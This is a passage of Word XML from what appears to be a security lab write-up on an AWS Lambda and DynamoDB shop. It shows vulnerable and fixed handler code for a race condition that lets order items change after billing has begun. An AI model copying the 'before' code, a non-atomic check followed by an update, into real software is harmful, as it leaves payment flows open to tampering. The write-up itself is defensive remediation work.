    <w:p w14:paraId="2B82380E" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DAD41A2" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    res = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABBC7CE" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "status": "ok",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED0F83" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "amount": float(cartTotal),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31790116" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "token": res['confirmation_token'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2B836F" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "missing": missings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425DF604" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B3D63D" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="732EB361" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A48C8B" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B09787" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    if getattr(e, "response", {}).get("Error", {}).get("Code") == "ConditionalCheckFailedException":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B1C028" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B257527" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            "status": "err",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170C4E79" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            "msg": "invalid state transition"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2B260A" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685F1C4E" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CDD1E7" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        res = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FA3E2C" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            "status": "err",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002FDAC1" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            "msg": "unknown error"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF0519" w14:textId="46E7DD81" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F96A6E" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E07009F" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>This makes the billing update atomic. If the order is no longer open when payment processing returns, DynamoDB rejects the update and the function returns an invalid state transition error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FF5ABA" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65EA28A4" w14:textId="77777777" w:rsidR="00B861FB" w:rsidRDefault="00B861FB" w:rsidP="00B861FB">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="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F50AC" w14:paraId="7DDED3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300" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="300" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="766438AA" w14:textId="31DAFBFD" w:rsidR="00CF50AC" w:rsidRDefault="00B861FB">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00B861FB">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B85C00"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3901F0F4" wp14:editId="1A858487">
                  <wp:extent cx="5943600" cy="4615815"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="83916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64225" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="4615815"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0DD8B105" w14:textId="695A19F8" w:rsidR="00B861FB" w:rsidRDefault="00000000" w:rsidP="00B861FB">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 9: </w:t>
      </w:r>
      <w:r w:rsidR="00B861FB" w:rsidRPr="00B861FB">
        <w:t>Lambda console showing the fixed billing handler code with conditional status check.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6877388C" w14:textId="4D0BC370" w:rsidR="00CF50AC" w:rsidRDefault="00CF50AC">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C13025" w14:textId="3A5E19EE" w:rsidR="00CF50AC" w:rsidRDefault="00000000" w:rsidP="000902DD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Change 2: </w:t>
      </w:r>
      <w:r w:rsidR="000902DD">
        <w:t>Reject item updates when order is not in a modifiable state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2271FC" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The update handler is responsible for changing the item list of an existing order. Before the fix, the function checked the order status using </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s1"/>
        </w:rPr>
        <w:t>get_item()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, but the final DynamoDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s1"/>
        </w:rPr>
        <w:t>update_item()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> call did not enforce the status condition atomically. This created a race-condition risk because the order status could change between the first read and the final update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E60DAC0" w14:textId="621DC40B" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>Before (vulnerable):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFD638B" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>The function first reads the order status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB1B4D7" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>response = table.get_item(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4873A36D" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Key={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17516817" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "orderId": orderId,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2912E584" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "userId": userId</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FBC468" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AAA03F" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  AttributesToGet=['orderStatus']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D28242" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DBCAA3" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21F98C96" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>if response["Item"]["orderStatus"] &gt; 110:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9317E5" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  res = {"status": "err", "msg": "order already paid"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78936EE9" w14:textId="0F08BAB5" w:rsidR="000902DD" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCB08CC" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>However, the actual update operation did not include a conditional expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B975851" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>update_expr = 'SET {} = :itemList'.format("itemList")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08240767" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>response = table.update_item(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693CA413" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  Key={"orderId": orderId, "userId": userId},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566F6CCE" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  UpdateExpression=update_expr,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BADF700" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  ExpressionAttributeValues={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE97E83" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ':itemList': itemList</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A73451" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CE7A4A" w14:textId="248EE144" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2600CF2A" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>Because the status check and update were separate operations, an attacker could send an update request immediately after billing started and potentially change the order contents after the payment workflow had already begun.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0E9F43" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="040FD06B" w14:textId="2B6552B6" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>After (fixed):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773448C8" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The final DynamoDB update was changed to include a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s1"/>
        </w:rPr>
        <w:t>ConditionExpression</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The item list can now only be updated if the order is still open, with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s1"/>
        </w:rPr>
        <w:t>orderStatus = 100</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E49E2EF" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>update_expr = 'SET {} = :itemList'.format("itemList")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7393D405" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0939C4EC" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08444404" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  response = table.update_item(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF1FC5C" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Key={"orderId": orderId, "userId": userId},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B2407" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    UpdateExpression=update_expr,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3451C269" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ConditionExpression="orderStatus = :open_status",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C13E1" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    ExpressionAttributeValues={</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B3817E" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      ':itemList': itemList,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7BA80C" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      ':open_status': 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EAB611" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F577E9F" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA1686F" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D305FE3" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DB6114" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  print(e)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22281F66" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  if getattr(e, "response", {}).get("Error", {}).get("Code") == "ConditionalCheckFailedException":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78494B71" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    res = {"status": "err", "msg": "invalid state transition"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE02184" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67729B58" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    res = {"status": "err", "msg": "could not update cart"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3513843D" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  return res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663E0B2B" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>This makes the status check and the update occur as one atomic DynamoDB operation. If the order is no longer open, DynamoDB rejects the update and the function returns an invalid state transition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F50AC" w14:paraId="34FE3B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300" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="300" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="14C7185C" w14:textId="14147AA4" w:rsidR="00CF50AC" w:rsidRDefault="00DA54ED">
            <w:pPr>
              <w:spacing w:before="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00DA54ED">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B85C00"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70B19E39" wp14:editId="690FD6D5">
                  <wp:extent cx="5943600" cy="4285615"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="89702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21271" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5943600" cy="4285615"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="184E6113" w14:textId="2670BC16" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 10: </w:t>
      </w:r>
      <w:r w:rsidR="00DA54ED" w:rsidRPr="00DA54ED">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Lambda console showing the fixed update handler code with conditional status check.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448395E2" w14:textId="77777777" w:rsidR="00DA54ED" w:rsidRDefault="00DA54ED" w:rsidP="00DA54ED">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t>This makes the status check and the update occur as one atomic DynamoDB operation. If the order is no longer open, DynamoDB rejects the update and the function returns an invalid state transition error.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100F6728" w14:textId="77777777" w:rsidR="00CF50AC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Part 8) Verification After Fix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B15842" w14:textId="77777777" w:rsidR="00CB5516" w:rsidRDefault="00CB5516" w:rsidP="00CB5516">
      <w:pPr>
        <w:pStyle w:val="p1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">After deploying the fixes in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s1"/>
        </w:rPr>
        <w:t>order_billing.py</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="s1"/>
        </w:rPr>
